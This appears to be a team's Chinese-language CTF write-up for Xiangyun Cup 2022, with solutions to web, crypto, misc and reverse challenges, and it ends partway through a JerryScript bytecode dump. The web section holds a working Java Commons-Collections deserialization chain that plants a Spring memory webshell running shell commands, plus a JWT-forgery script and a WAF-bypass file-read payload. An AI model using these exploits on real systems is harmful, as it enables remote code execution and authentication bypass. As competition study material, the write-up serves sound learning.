祥云杯 2022 By W&M
WEB
ezjava
非预期直接CC2。打内存马
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.ibatis.javassist.ClassClassPath;
import org.apache.ibatis.javassist.ClassPool;
import org.apache.ibatis.javassist.CtClass;
public class CommonCollection2 {
public static void main(String[] args) throws Exception {
Constructor constructor = Class.forName("org.apache.commons.collections4.functors.InvokerTransformer")
.getDeclaredConstructor(String.class);
constructor.setAccessible(true);
InvokerTransformer transformer = (InvokerTransformer) constructor.newInstance("newTransformer");
ClassPool pool = ClassPool.getDefault();
pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
byte[] bytes = ClassPool.getDefault().get(g.class.getName()).toBytecode();
byte[][] targetByteCodes = new byte[][]{bytes};
TemplatesImpl templates = TemplatesImpl.class.newInstance();
setFieldValue(templates, "_bytecodes", targetByteCodes);
setFieldValue(templates, "_name", "name");
setFieldValue(templates, "_class", null);
TransformingComparator comparator = new TransformingComparator(transformer);
PriorityQueue queue = new PriorityQueue(1);
Object[] queue_array = new Object[]{templates, 1};
Field queue_field = Class.forName("java.util.PriorityQueue").getDeclaredField("queue");
queue_field.setAccessible(true);
queue_field.set(queue, queue_array);
Field size = Class.forName("java.util.PriorityQueue").getDeclaredField("size");
size.setAccessible(true);
size.set(queue, 2);
Field comparator_field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
comparator_field.setAccessible(true);
comparator_field.set(queue, comparator);
try {
/* ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc2"));
outputStream.writeObject(queue);
outputStream.close();*/
ByteArrayOutputStream btout = new ByteArrayOutputStream();
ObjectOutputStream objOut = new ObjectOutputStream(btout);
objOut.writeObject(queue);
byte[] serialized = btout.toByteArray();
System.out.println(Base64.getEncoder().encodeToString(serialized));
//ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc2"));
//inputStream.readObject();
} catch (Exception e) {
e.printStackTrace();
}
}
public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
final Field field = getField(obj.getClass(), fieldName);
field.set(obj, value);
}
public static Field getField(final Class<?> clazz, final String fieldName) {
Field field = null;
try {
field = clazz.getDeclaredField(fieldName);
field.setAccessible(true);
} catch (NoSuchFieldException ex) {
if (clazz.getSuperclass() != null)
field = getField(clazz.getSuperclass(), fieldName);
}
return field;
}
}
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.util.Base64Utils;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.handler.AbstractHandlerMapping;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.ArrayList;
public class g extends AbstractTranslet {
static {
try {
printName();
} catch (NoSuchFieldException e) {
e.printStackTrace();
} catch (ClassNotFoundException e) {
e.printStackTrace();
} catch (InvocationTargetException e) {
e.printStackTrace();
} catch (NoSuchMethodException e) {
e.printStackTrace();
} catch (IllegalAccessException e) {
e.printStackTrace();
} catch (InstantiationException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
}
public static void printName() throws NoSuchMethodException, InvocationTargetException, IllegalAccessException, NoSuchFieldException, ClassNotFoundException, InstantiationException, IOException {
String className = "GuokeController";
byte[] bytes = Base64Utils.decodeFromString("yv66vgAAADQAiAoAIABGCABHCwBIAEkLAEoASwgATAgATQoATgBPCgAMAFAIAFEKAAwAUgcAUwcAVAgAVQgAVgoACwBXCABYCABZBwBaCgALAFsKAFwAXQoAEgBeCABfCgASAGAKABIAYQoAEgBiCgASAGMKAGQAZQoAZABmCgBkAGMHAGcHAGgHAGkBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEUxHdW9rZUNvbnRyb2xsZXI7AQAJcHJlSGFuZGxlAQBkKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTtMamF2YS9sYW5nL09iamVjdDspWgEAAXABABpMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwEABndyaXRlcgEAFUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAAW8BABJMamF2YS9sYW5nL1N0cmluZzsBAAFjAQATTGphdmEvdXRpbC9TY2FubmVyOwEAB3JlcXVlc3QBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAhyZXNwb25zZQEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAAdoYW5kbGVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEY29kZQEADVN0YWNrTWFwVGFibGUHAFQHAGoHAFMHAFoHAGgHAGsHAGwHAG0HAGcBAApFeGNlcHRpb25zAQAKU291cmNlRmlsZQEAFEd1b2tlQ29udHJvbGxlci5qYXZhDAAhACIBAApndW9rZTEyMTM4BwBrDABuAG8HAGwMAHAAcQEAAAEAB29zLm5hbWUHAHIMAHMAbwwAdAB1AQADd2luDAB2AHcBABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIBABBqYXZhL2xhbmcvU3RyaW5nAQAHY21kLmV4ZQEAAi9jDAAhAHgBAAcvYmluL3NoAQACLWMBABFqYXZhL3V0aWwvU2Nhbm5lcgwAeQB6BwB7DAB8AH0MACEAfgEAAlxBDAB/AIAMAIEAggwAgwB1DACEACIHAGoMAIUAhgwAhwAiAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAD0d1b2tlQ29udHJvbGxlcgEAQW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvaGFuZGxlci9IYW5kbGVySW50ZXJjZXB0b3JBZGFwdGVyAQATamF2YS9pby9QcmludFdyaXRlcgEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAEGphdmEvbGFuZy9PYmplY3QBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAHaGFzTmV4dAEAAygpWgEABG5leHQBAAVjbG9zZQEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAFZmx1c2gAIQAfACAAAAAAAAIAAQAhACIAAQAjAAAALwABAAEAAAAFKrcAAbEAAAACACQAAAAGAAEAAAAFACUAAAAMAAEAAAAFACYAJwAAAAEAKAApAAIAIwAAAboABgAJAAAArysSArkAAwIAOgQZBMYAoSy5AAQBADoFEgU6BhIGuAAHtgAIEgm2AAqZACK7AAtZBr0ADFkDEg1TWQQSDlNZBRkEU7cADzoHpwAfuwALWQa9AAxZAxIQU1kEEhFTWQUZBFO3AA86B7sAElkZB7YAE7YAFLcAFRIWtgAXOggZCLYAGJkACxkItgAZpwAFGQY6BhkItgAaGQUZBrYAGxkFtgAcGQW2AB2nAAU6BQOsBKwAAQAPAKYAqQAeAAMAJAAAAEYAEQAAAAcACgAIAA8ACgAXAAsAGwANACsADgBKABAAZgASAHwAEwCQABQAlQAVAJwAFgChABcApgAZAKkAGACrABoArQAcACUAAABmAAoARwADACoAKwAHABcAjwAsAC0ABQAbAIsALgAvAAYAZgBAACoAKwAHAHwAKgAwADEACAAAAK8AJgAnAAAAAACvADIAMwABAAAArwA0ADUAAgAAAK8ANgA3AAMACgClADgALwAEADkAAAA5AAf+AEoHADoHADsHADr8ABsHADz8ACUHAD1BBwA6/wAaAAUHAD4HAD8HAEAHAEEHADoAAQcAQgEBAEMAAAAEAAEAHgABAEQAAAACAEU");
//控制器的bytecode
ClassLoader classLoader = Thread.currentThread().getClass().getClassLoader();
Method method = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
method.setAccessible(true);
method.invoke(classLoader, className, bytes, 0, bytes.length);
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
AbstractHandlerMapping abstractHandlerMapping = (AbstractHandlerMapping) context.getBean("requestMappingHandlerMapping");
Field field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
field.setAccessible(true);
ArrayList<Object> adaptedInterceptors = (ArrayList<Object>) field.get(abstractHandlerMapping);
adaptedInterceptors.add(classLoader.loadClass(className).newInstance());
}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
}FunWEB
jwt的一个cve
https://github.com/davedoesdev/python-jwt/blob/master/test/vulnerability_vows.pyimport json
from json import loads, dumps
import requests
import re
from jwcrypto.common import base64url_decode, base64url_encode
topic=requests.post(url="http://eci-2zegk71yvywhykjxwuv8.cloudeci1.ichunqiu.com/signin",proxies={"http":"http://127.0.0.1:8080"},headers = {'Content-Type': 'application/json'},data=json.dumps({"username":"1","password":"1"}))
res=topic.headers
jwttoken=re.search("token=(.*?);",str(res),re.I|re.M).group(1)
[header, payload, signature] = jwttoken.split('.')
parsed_payload = loads(base64url_decode(payload))
parsed_payload["is_admin"]=1
fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
token=('{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}')
print(token)替换token
登录拿到flag
RustWaf
接受POST。然后通过rust-waf。返回值会经过json.parse。然后读文件
readfile随便post一个。
字符串不能包含flag和proc。并且会用rust的json去解析。
如果解析失败直接就返回字符串。然后再经过nodejs的js解析。
根据https://ctftime.org/writeup/35075得到大致的payload
file[href]=a&file[origin]=a&file[protocol]=file:&file[hostname]=&file[pathname]=/app/fl%2561g.txt
大致可以想到。构造一个json字符串。让rust解析失败。返回字符串。再经过nodejs的json正常解析。
最后读取文件
{"href":"a","origin":"a","pathname":"/fl%61g","hostname":"","protocol":"file:","a":1e+5000000000000}
Crypto
tracing
正常的RSA,但是给了gcd的脚本运行过程,根据结果逆向回去得到phi
import re
s, a, b = 0, 1, 0
flag = 0
def solve(cmd):
global s, a, b, flag
pos = re.findall("\(\d+\)", cmd)
# print(pos)
if pos:
pos = int(pos[0][1:-1])
if pos in [12, 16, 21]:
a, b = b, a
elif pos == 34:
flag += 1
elif pos == 10 and flag:
a <<= 1
flag -= 1
elif pos == 19 and flag:
a <<= 1
flag -= 1
assert a & 1 == 0
assert b & 1 == 1
assert flag == 0
elif pos == 14 and flag:
b <<= 1
flag -= 1
assert a & 1 == 1
assert b & 1 == 0
assert flag == 0
elif pos == 9:
a += b
assert a & 1 == 1
assert b & 1 == 1
assert flag == 0
elif pos in [11, 31, 8, 7, 6, 20, 18, 15, 5]:
pass
else:
print(pos, flag, cmd[:-1])
print('ERROR')
exit(0)
f = open("out.out", "r")
data = f.readlines()
f.close()
for i in data[::-1]:
solve(i)
from Crypto.Util.number import *
c = 64885875317556090558238994066256805052213864161514435285748891561779867972960805879348109302233463726130814478875296026610171472811894585459078460333131491392347346367422276701128380739598873156279173639691126814411752657279838804780550186863637510445720206103962994087507407296814662270605713097055799853102
n = 113793513490894881175568252406666081108916791207947545198428641792768110581083359318482355485724476407204679171578376741972958506284872470096498674038813765700336353715590069074081309886710425934960057225969468061891326946398492194812594219890553185043390915509200930203655022420444027841986189782168065174301
phi, e = a, b
d = inverse(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
print(flag)fermat
obfuscate写了一大堆看不懂的东西,反正就是类似于在p的基础上加一个数得到q,本地测试之后发现A很小,直接费马分解做掉,x根据威尔逊定力选p-1即可
from Crypto.Util.number import *
from gmpy2 import *
n = 141321067325716426375483506915224930097246865960474155069040176356860707435540270911081589751471783519639996589589495877214497196498978453005154272785048418715013714419926299248566038773669282170912502161620702945933984680880287757862837880474184004082619880793733517191297469980246315623924571332042031367393
c = 81368762831358980348757303940178994718818656679774450300533215016117959412236853310026456227434535301960147956843664862777300751319650636299943068620007067063945453310992828498083556205352025638600643137849563080996797888503027153527315524658003251767187427382796451974118362546507788854349086917112114926883
p = 11887853772894265642834649929578157180848240939084164222334476057487485972806971092902627112665734648016476153593841839977704512156756634066593725142934001
q = 11887853772894265642834649929578157180848240939084164222334476057487485972806971092902627112665734646483980612727952939084061619889139517526028673988305393
x = p - 1
assert pow(114514, x, p) == 1
e = 65537
d = inverse(e, (p-1)*(q-1))
m = pow(c, d, n)
m = m ^ (x**2)
flag = long_to_bytes(m)
print(flag)MISC
BearParser
虽然是私链,但是每个队伍部署的合约都一样,所以可以拿其他队伍做题的calldata重放到自己队伍部署的合约,蹭车。
-
在有其他队伍做出来题目后,爬取区块,找到做出来题目的队伍调用题目合约时传入的calldata,直接拿过来用。
//https://web3playground.io/ //连接metamask 去f12执行 for(let i = 1 ; i < await web3.eth.getBlockNumber() ; i ++){ let block = await web3.eth.getBlock(i,true); let transactions = block.transactions; for(let j = 0 ; j < transactions.length; j ++){ let transaction = transactions[j]; let events = await web3.eth.getTransactionReceipt(transaction.hash) transaction.input && transaction.input != "0x" && events.logs[0] && console.log("" + i + " "+transaction.input); } }190 0x26ad15930000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000008061616161616161616161616161616161616161616161616161616161616161616262626262626262626262626262626262626262626262626262626262626262000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000e0000000000000000000000000000000000000000000000000000000001111111100000000000000000000000000000000000000000000000000000000111111110000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000000278780000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000006fb9eccc000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000027878000000000000000000000000000000000000000000000000000000000000 -
remix ide新建一个空合约 必须有fallback函数 否则remix计算不出gas。编译,不需要部署
contract xiangyun{ fallback() external{ } } -
部署页面 At Address添加题目部署的合约 下面Low level interactions直接把爬取到的calldata填进去 执行
把transaction hash填到题目里得到flag。
strange_forensics
下载了附件,同时根据题目描述得知,最终的flag由3段flag合起来,那么winhex打开搜了一下flag,发现有flag3的字眼,同时要符合题目描述说的最后带.:
然后同样在winhex里面搜了一下镜像版本,发现是一个ubuntu18.04的系统:
那么就知道是一个linux的内存取证,但是profile需要自己制作。
参考这篇文章:https://www.modb.pro/db/225668 可知我们只需要把内核system.map文件和 module.dwarf文件打包成一个zip文件即可。
我们先下载了一个ubuntu18.04的虚拟机,查看内核发现刚好一模一样:
然后先下载了volatility,然后在/volatility/tools/linux 下执行make命令,即可得到module.dwarf(其中应该是会因为环境问题,有一些报错,是缺少部分环境,需自行去安装一下)
然后将上面得到的module.dwarf和system.map放在一起打包为ZIP文件,就是我们需要的profile文件:
然后再将制作好的ZIP文件放置volatility/plugins/overlays/linux/目录下,通过volatility --info查看,就可以看到我们配置好的profile文件了:
然后就是照例用linux_bash看了下bash历史记录和linux_psaux看了下进程和完整的命令行和开始时间:
通过linux_bash可以发现有个bob的用户:
通过linux_psaux可以看到最后有个/home/bob/Desktop/secret.zip
那么再使用linux_find_file列出这个文件,并尝试恢复文件:
python2.7 vol.py -f '/home/l1near/Desktop/1.mem' --profile=Linuxubuntu18_04x64 linux_find_file -F "/home/bob/Desktop/secret.zip"
python2.7 vol.py -f '/home/l1near/Desktop/1.mem' --profile=Linuxubuntu18_04x64 linux_find_file -i 0xffff97ce37a94568 -O /home/l1near/Desktop/secret.zip提取出文件,发现文件打开报错,直接把数据区inflate也不对,所以怀疑是加密位出现了问题,修改了一下从00改成09,然后用archpr爆破可以得到密码为123456,从而得到flag2:flag2 is _y0u_Ar3_tHe_LIn
同样的操作,去找到并提取了/etc/shadow文件
python2.7 vol.py -f '/home/l1near/Desktop/1.mem' --profile=Linuxubuntu18_04x64 linux_find_file -F "/etc/shadow"
python2.7 vol.py -f '/home/l1near/Desktop/1.mem' --profile=Linuxubuntu18_04x64 linux_find_file -i 0xffff97ce7444b448 -O /home/l1near/Desktop/shadow找到bob用户的密码:
cmd5找了下,发现能解出来,即为flag1
最后3段拼一起即为最后的flag
lena
解混淆
得到二维码扫描得到flag
RE
engtom
题目给了一个snapshot,通过信息收集知道快照是jerryscript的字节码状态
git一份jerryscript项目下来,直接使用是不能dump出字节码的,我们需要在build时候设置一些参数
cmake . -DJERRY_SNAPSHOT_EXEC=ON -DJERRY_ERROR_MESSAGES=ON -DJERRY_DEBUGGER=ON -DJERRY_LINE_INFO=ON -DJERRY_PARSER_DUMP_BYTE_CODE=ON -DJERRY_REGEXP_DUMP_BYTE_CODE=ON -DJERRY_LOGGING=ON得到编译好的jerry,带上参数dump字节码
./jerry --show-opcodes --exec-snapshot chall.snapshot贴上字节码
Byte code dump:
Maximum stack depth: 38
Flags: [small_lit_enc]
Argument range end: 0
Register range end: 5
Identifier range end: 30
Const literal range end: 91
Literal range end: 101
0 : CBC_CHECK_VAR ident:5->string(SboxTable)
2 : CBC_CHECK_VAR ident:6->string(CK)
4 : CBC_CHECK_VAR ident:7->string(FK)
6 : CBC_CHECK_VAR ident:8->string(bigxor)
8 : CBC_CHECK_VAR ident:9->string(leftshift)
10 : CBC_CHECK_VAR ident:10->string(prefixInteger)
12 : CBC_CHECK_VAR ident:11->string(sm4Sbox)
14 : CBC_CHECK_VAR ident:12->string(GET_ULONG_BE)
16 : CBC_CHECK_VAR ident:13->string(PUT_ULONG_BE)
18 : CBC_CHECK_VAR ident:14->string(sm4_getkey)
20 : CBC_CHECK_VAR ident:15->string(encrypt)
22 : CBC_CHECK_VAR ident:16->string(decrypt_sm4)
24 : CBC_CHECK_VAR ident:17->string(compare_array)
26 : CBC_CHECK_VAR ident:18->string(input)
28 : CBC_CHECK_VAR ident:19->string(num)
30 : CBC_CHECK_VAR ident:20->string(message)
32 : CBC_CHECK_VAR ident:21->string(count)
34 : CBC_CHECK_VAR ident:22->string(pad_len)
36 : CBC_CREATE_VAR_EVAL ident:5->string(SboxTable)
38 : CBC_CREATE_VAR_EVAL ident:6->string(CK)
40 : CBC_CREATE_VAR_EVAL ident:7->string(FK)
42 : CBC_CREATE_VAR_FUNC_EVAL lit:91 ident:8->string(bigxor)
45 : CBC_CREATE_VAR_FUNC_EVAL lit:92 ident:9->string(leftshift)
48 : CBC_CREATE_VAR_FUNC_EVAL lit:93 ident:10->string(prefixInteger)
51 : CBC_CREATE_VAR_FUNC_EVAL lit:94 ident:11->string(sm4Sbox)
54 : CBC_CREATE_VAR_FUNC_EVAL lit:95 ident:12->string(GET_ULONG_BE)
57 : CBC_CREATE_VAR_FUNC_EVAL lit:96 ident:13->string(PUT_ULONG_BE)
60 : CBC_CREATE_VAR_FUNC_EVAL lit:97 ident:14->string(sm4_getkey)
63 : CBC_CREATE_VAR_FUNC_EVAL lit:98 ident:15->string(encrypt)
66 : CBC_CREATE_VAR_FUNC_EVAL lit:99 ident:16->string(decrypt_sm4)
69 : CBC_CREATE_VAR_FUNC_EVAL lit:100 ident:17->string(compare_array)
72 : CBC_CREATE_VAR_EVAL ident:18->string(input)
74 : CBC_CREATE_VAR_EVAL ident:19->string(num)
76 : CBC_CREATE_VAR_EVAL ident:20->string(message)
78 : CBC_CREATE_VAR_EVAL ident:21->string(count)
80 : CBC_CREATE_VAR_EVAL ident:22->string(pad_len)
82 : CBC_PUSH_LITERAL ident:23->string(Array)
84 : CBC_NEW0
85 : CBC_ASSIGN_SET_IDENT ident:5->string(SboxTable)
87 : CBC_PUSH_LITERAL_PUSH_NUMBER_0 ident:5->string(SboxTable)
89 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:214
92 : CBC_PUSH_NUMBER_POS_BYTE number:144
94 : CBC_PUSH_NUMBER_POS_BYTE number:233
96 : CBC_PUSH_NUMBER_POS_BYTE number:254
98 : CBC_PUSH_NUMBER_POS_BYTE number:204
100 : CBC_PUSH_NUMBER_POS_BYTE number:225
102 : CBC_PUSH_NUMBER_POS_BYTE number:61
104 : CBC_PUSH_NUMBER_POS_BYTE number:183
106 : CBC_PUSH_NUMBER_POS_BYTE number:22
108 : CBC_PUSH_NUMBER_POS_BYTE number:182
110 : CBC_PUSH_NUMBER_POS_BYTE number:20
112 : CBC_PUSH_NUMBER_POS_BYTE number:194
114 : CBC_PUSH_NUMBER_POS_BYTE number:40
116 : CBC_PUSH_NUMBER_POS_BYTE number:251
118 : CBC_PUSH_NUMBER_POS_BYTE number:44
120 : CBC_PUSH_NUMBER_POS_BYTE number:5
122 : CBC_NEW byte_arg:16
124 : CBC_ASSIGN_BLOCK
125 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:1
128 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:43
131 : CBC_PUSH_NUMBER_POS_BYTE number:103
133 : CBC_PUSH_NUMBER_POS_BYTE number:154
135 : CBC_PUSH_NUMBER_POS_BYTE number:118
137 : CBC_PUSH_NUMBER_POS_BYTE number:42
139 : CBC_PUSH_NUMBER_POS_BYTE number:190
141 : CBC_PUSH_NUMBER_POS_BYTE number:4
143 : CBC_PUSH_NUMBER_POS_BYTE number:195
145 : CBC_PUSH_NUMBER_POS_BYTE number:170
147 : CBC_PUSH_NUMBER_POS_BYTE number:68
149 : CBC_PUSH_NUMBER_POS_BYTE number:19
151 : CBC_PUSH_NUMBER_POS_BYTE number:38
153 : CBC_PUSH_NUMBER_POS_BYTE number:73
155 : CBC_PUSH_NUMBER_POS_BYTE number:134
157 : CBC_PUSH_NUMBER_POS_BYTE number:6
159 : CBC_PUSH_NUMBER_POS_BYTE number:153
161 : CBC_NEW byte_arg:16
163 : CBC_ASSIGN_BLOCK
164 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:2
167 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:156
170 : CBC_PUSH_NUMBER_POS_BYTE number:66
172 : CBC_PUSH_NUMBER_POS_BYTE number:80
174 : CBC_PUSH_NUMBER_POS_BYTE number:244
176 : CBC_PUSH_NUMBER_POS_BYTE number:145
178 : CBC_PUSH_NUMBER_POS_BYTE number:239
180 : CBC_PUSH_NUMBER_POS_BYTE number:152
182 : CBC_PUSH_NUMBER_POS_BYTE number:122
184 : CBC_PUSH_NUMBER_POS_BYTE number:51
186 : CBC_PUSH_NUMBER_POS_BYTE number:84
188 : CBC_PUSH_NUMBER_POS_BYTE number:11
190 : CBC_PUSH_NUMBER_POS_BYTE number:67
192 : CBC_PUSH_NUMBER_POS_BYTE number:237
194 : CBC_PUSH_NUMBER_POS_BYTE number:207
196 : CBC_PUSH_NUMBER_POS_BYTE number:172
198 : CBC_PUSH_NUMBER_POS_BYTE number:98
200 : CBC_NEW byte_arg:16
202 : CBC_ASSIGN_BLOCK
203 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:3
206 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:228
209 : CBC_PUSH_NUMBER_POS_BYTE number:179
211 : CBC_PUSH_NUMBER_POS_BYTE number:28
213 : CBC_PUSH_NUMBER_POS_BYTE number:169
215 : CBC_PUSH_NUMBER_POS_BYTE number:201
217 : CBC_PUSH_NUMBER_POS_BYTE number:8
219 : CBC_PUSH_NUMBER_POS_BYTE number:232
221 : CBC_PUSH_NUMBER_POS_BYTE number:149
223 : CBC_PUSH_NUMBER_POS_BYTE number:128
225 : CBC_PUSH_NUMBER_POS_BYTE number:223
227 : CBC_PUSH_NUMBER_POS_BYTE number:148
229 : CBC_PUSH_NUMBER_POS_BYTE number:250
231 : CBC_PUSH_NUMBER_POS_BYTE number:117
233 : CBC_PUSH_NUMBER_POS_BYTE number:143
235 : CBC_PUSH_NUMBER_POS_BYTE number:63
237 : CBC_PUSH_NUMBER_POS_BYTE number:166
239 : CBC_NEW byte_arg:16
241 : CBC_ASSIGN_BLOCK
242 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:4
245 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:71
248 : CBC_PUSH_NUMBER_POS_BYTE number:7
250 : CBC_PUSH_NUMBER_POS_BYTE number:167
252 : CBC_PUSH_NUMBER_POS_BYTE number:252
254 : CBC_PUSH_NUMBER_POS_BYTE number:243
256 : CBC_PUSH_NUMBER_POS_BYTE number:115
258 : CBC_PUSH_NUMBER_POS_BYTE number:23
260 : CBC_PUSH_NUMBER_POS_BYTE number:186
262 : CBC_PUSH_NUMBER_POS_BYTE number:131
264 : CBC_PUSH_NUMBER_POS_BYTE number:89
266 : CBC_PUSH_NUMBER_POS_BYTE number:60
268 : CBC_PUSH_NUMBER_POS_BYTE number:25
270 : CBC_PUSH_NUMBER_POS_BYTE number:230
272 : CBC_PUSH_NUMBER_POS_BYTE number:133
274 : CBC_PUSH_NUMBER_POS_BYTE number:79
276 : CBC_PUSH_NUMBER_POS_BYTE number:168
278 : CBC_NEW byte_arg:16
280 : CBC_ASSIGN_BLOCK
281 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:5
284 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:104
287 : CBC_PUSH_NUMBER_POS_BYTE number:107
289 : CBC_PUSH_NUMBER_POS_BYTE number:129
291 : CBC_PUSH_NUMBER_POS_BYTE number:178
293 : CBC_PUSH_NUMBER_POS_BYTE number:113
295 : CBC_PUSH_NUMBER_POS_BYTE number:100
297 : CBC_PUSH_NUMBER_POS_BYTE number:218
299 : CBC_PUSH_NUMBER_POS_BYTE number:139
301 : CBC_PUSH_NUMBER_POS_BYTE number:248
303 : CBC_PUSH_NUMBER_POS_BYTE number:235
305 : CBC_PUSH_NUMBER_POS_BYTE number:15
307 : CBC_PUSH_NUMBER_POS_BYTE number:75
309 : CBC_PUSH_NUMBER_POS_BYTE number:112
311 : CBC_PUSH_NUMBER_POS_BYTE number:86
313 : CBC_PUSH_NUMBER_POS_BYTE number:157
315 : CBC_PUSH_NUMBER_POS_BYTE number:53
317 : CBC_NEW byte_arg:16
319 : CBC_ASSIGN_BLOCK
320 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:6
323 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:30
326 : CBC_PUSH_NUMBER_POS_BYTE number:36
328 : CBC_PUSH_NUMBER_POS_BYTE number:14
330 : CBC_PUSH_NUMBER_POS_BYTE number:94
332 : CBC_PUSH_NUMBER_POS_BYTE number:99
334 : CBC_PUSH_NUMBER_POS_BYTE number:88
336 : CBC_PUSH_NUMBER_POS_BYTE number:209
338 : CBC_PUSH_NUMBER_POS_BYTE number:162
340 : CBC_PUSH_NUMBER_POS_BYTE number:37
342 : CBC_PUSH_NUMBER_POS_BYTE number:34
344 : CBC_PUSH_NUMBER_POS_BYTE number:124
346 : CBC_PUSH_NUMBER_POS_BYTE number:59
348 : CBC_PUSH_NUMBER_POS_BYTE number:1
350 : CBC_PUSH_NUMBER_POS_BYTE number:33
352 : CBC_PUSH_NUMBER_POS_BYTE number:120
354 : CBC_PUSH_NUMBER_POS_BYTE number:135
356 : CBC_NEW byte_arg:16
358 : CBC_ASSIGN_BLOCK
359 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:7
362 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:212
365 : CBC_PUSH_NUMBER_0
366 : CBC_PUSH_NUMBER_POS_BYTE number:70
368 : CBC_PUSH_NUMBER_POS_BYTE number:87
370 : CBC_PUSH_NUMBER_POS_BYTE number:159
372 : CBC_PUSH_NUMBER_POS_BYTE number:211
